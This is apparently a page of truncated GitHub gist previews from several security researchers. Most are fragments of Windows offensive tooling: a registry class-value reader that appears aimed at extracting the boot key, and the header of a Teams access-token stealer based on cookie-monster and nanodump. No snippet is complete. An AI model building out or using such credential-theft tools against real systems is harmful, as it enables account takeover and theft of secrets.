Dfte

#include <windows.h>
#include <stdio.h>
#define BOOT_KEY_SIZE 16
#pragma warning(disable: 4996)

void getRegistryClassValue(HKEY rootKey, const char* subKey, char* classValue, DWORD classValueSize) {
    HKEY hKey;
    LONG result = RegOpenKeyExA(rootKey, subKey, 0, KEY_READ, &hKey);
    if (result != ERROR_SUCCESS) {
        fprintf(stderr, "Error opening registry key: %ld\n", result);

eversinc33

#include <windows.h>
#include <iostream>
#include <sstream>

std::string 
GetSymbolServerURL(
    const std::string& moduleName
) 
{
    /* Extract timestamp and image size from a module 

LuemmelSec

# 1. Fetch and extract the ASR rule table block
$asrUrl = "https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference#asr-rule-to-guid-matrix"
$page = Invoke-WebRequest -Uri $asrUrl -UseBasicParsing

# Extract the table HTML after the ASR heading
$tableBlock = [regex]::Match($page.Content, '(?is)<h2 id="asr-rule-to-guid-matrix">.*?<table.*?>(.*?)</table>').Groups[1].Value

# 2. Parse each table row (skip header, only rows with two <td>s)
$asrRuleMap = @{}
foreach ($row in [regex]::Matches($tableBlock, '<tr>\s*<td.*?</td>\s*<td.*?</td>\s*</tr>', 'IgnoreCase')) {

clod81

// Based on research: https://blog.randorisec.fr/ms-teams-access-tokens/
// Heavily based on cookie-monster BOF: https://github.com/KingOfTheNOPs/cookie-monster
// Code based on mr.un1k0d3r's seasonal videos and his cookie-grabber POC
// https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF/blob/main/cookie-graber.c
// fileless download based on nanodump methods
// https://github.com/fortra/nanodump

#include <windows.h>
#include <stdint.h> 
#include <stdio.h>